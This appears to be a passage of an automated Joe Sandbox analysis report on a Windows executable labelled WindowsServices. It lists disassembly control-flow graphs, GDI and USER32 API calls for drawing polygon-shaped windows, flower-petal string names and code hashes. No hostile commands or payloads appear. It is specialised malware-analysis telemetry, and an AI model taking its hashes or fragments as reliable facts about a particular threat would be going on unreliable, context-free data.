                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 40b2a2-40b2b7 69CE4ED0
                                                                        APIs
                                                                        • 69CE4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040A5A2
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040A5DF
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreateMetricsRectSystem$BitmapClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 291364621-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1221 404ec0-404ef6 CopyRect call 403c20 1224 404f06-404f28 CopyRect call 403c20 1221->1224 1225 404ef8-404f03 1221->1225 1228 404f38-404f5a CopyRect call 403c20 1224->1228 1229 404f2a-404f35 1224->1229 1232 404f6a-404f8c CopyRect call 403c20 1228->1232 1233 404f5c-404f67 1228->1233 1236 404f9c-404fbe CopyRect call 403c20 1232->1236 1237 404f8e-404f99 1232->1237 1240 404fc0-404fcb 1236->1240 1241 404fce-404ff0 CopyRect call 403c20 1236->1241 1244 405000-405022 CopyRect call 403c20 1241->1244 1245 404ff2-404ffd 1241->1245 1248 405032-405054 CopyRect call 403c20 1244->1248 1249 405024-40502f 1244->1249 1252 405064-405086 CopyRect call 403c20 1248->1252 1253 405056-405061 1248->1253 1256 405096-4050b8 CopyRect call 403c20 1252->1256 1257 405088-405093 1252->1257 1260 4050c8-4050ea CopyRect call 403c20 1256->1260 1261 4050ba-4050c5 1256->1261 1264 4050fa-40511c CopyRect call 403c20 1260->1264 1265 4050ec-4050f7 1260->1265 1268 40512c-40514e CopyRect call 403c20 1264->1268 1269 40511e-405129 1264->1269 1272 405150-40515b 1268->1272 1273 40515e-405180 CopyRect call 403c20 1268->1273 1276 405190-4051b2 CopyRect call 403c20 1273->1276 1277 405182-40518d 1273->1277 1280 4051c2-4051e4 CopyRect call 403c20 1276->1280 1281 4051b4-4051bf 1276->1281 1284 4051f4-405216 CopyRect call 403c20 1280->1284 1285 4051e6-4051f1 1280->1285 1288 405226-405248 CopyRect call 403c20 1284->1288 1289 405218-405223 1284->1289 1292 405258-40527a CopyRect call 403c20 1288->1292 1293 40524a-405255 1288->1293 1296 40528a-4052b7 CopyRect call 403c20 1292->1296 1297 40527c-405287 1292->1297
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1349 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1352 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1349->1352 1353 40b186-40b191 __setusermatherr 1349->1353 1356 40b225-40b228 1352->1356 1357 40b1eb-40b1f3 1352->1357 1353->1352 1358 40b202-40b206 1356->1358 1359 40b22a-40b22e 1356->1359 1360 40b1f5-40b1f7 1357->1360 1361 40b1f9-40b1fc 1357->1361 1363 40b208-40b20a 1358->1363 1364 40b20c-40b21d GetStartupInfoA 1358->1364 1359->1356 1360->1357 1360->1361 1361->1358 1362 40b1fe-40b1ff 1361->1362 1362->1358 1363->1362 1363->1364 1365 40b230-40b232 1364->1365 1366 40b21f-40b223 1364->1366 1367 40b233-40b23e GetModuleHandleA call 40b2a2 1365->1367 1366->1367 1369 40b243-40b260 exit _XcptFilter 1367->1369
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1370 404360-4044a9 call 4048b0 call 40adf6 call 40adf0 call 40adea 1379 404552-40455e 1370->1379 1380 4044af-4044b1 1370->1380 1381 404560-404572 CreatePolygonRgn call 40ae02 1379->1381 1382 4045cb-4045d4 CreatePolygonRgn call 40ae02 1379->1382 1380->1379 1383 4044b7-4044bd 1380->1383 1391 404574-404576 1381->1391 1392 404578 1381->1392 1388 4045d9-4045db 1382->1388 1383->1379 1386 4044c3-4044c7 1383->1386 1389 4044cd-4044e3 1386->1389 1390 40454e 1386->1390 1393 4045e6-404667 call 40adcc * 4 1388->1393 1394 4045dd-4045e3 call 40add2 1388->1394 1395 4044e9-404548 _ftol * 2 1389->1395 1390->1379 1397 40457b-4045c9 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1391->1397 1392->1397 1394->1393 1395->1395 1399 40454a-40454c 1395->1399 1397->1388 1399->1390
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1410 403e10-403f48 call 4048b0 * 2 call 40adf6 call 40adf0 call 40adea 1421 403fd1-403fdd 1410->1421 1422 403f4e-403f50 1410->1422 1424 40404a-404053 CreatePolygonRgn call 40ae02 1421->1424 1425 403fdf-403ff1 CreatePolygonRgn call 40ae02 1421->1425 1422->1421 1423 403f52-403f56 1422->1423 1423->1421 1426 403f58-403f6e 1423->1426 1431 404058-40405a 1424->1431 1435 403ff3-403ff5 1425->1435 1436 403ff7 1425->1436 1429 403f74-403fcb _ftol * 2 1426->1429 1429->1429 1434 403fcd-403fcf 1429->1434 1432 404065-4040e6 call 40adcc * 4 1431->1432 1433 40405c-404062 call 40add2 1431->1433 1433->1432 1434->1421 1439 403ffa-404048 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1435->1439 1436->1439 1439->1431
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00409EBE
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 1654611898-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
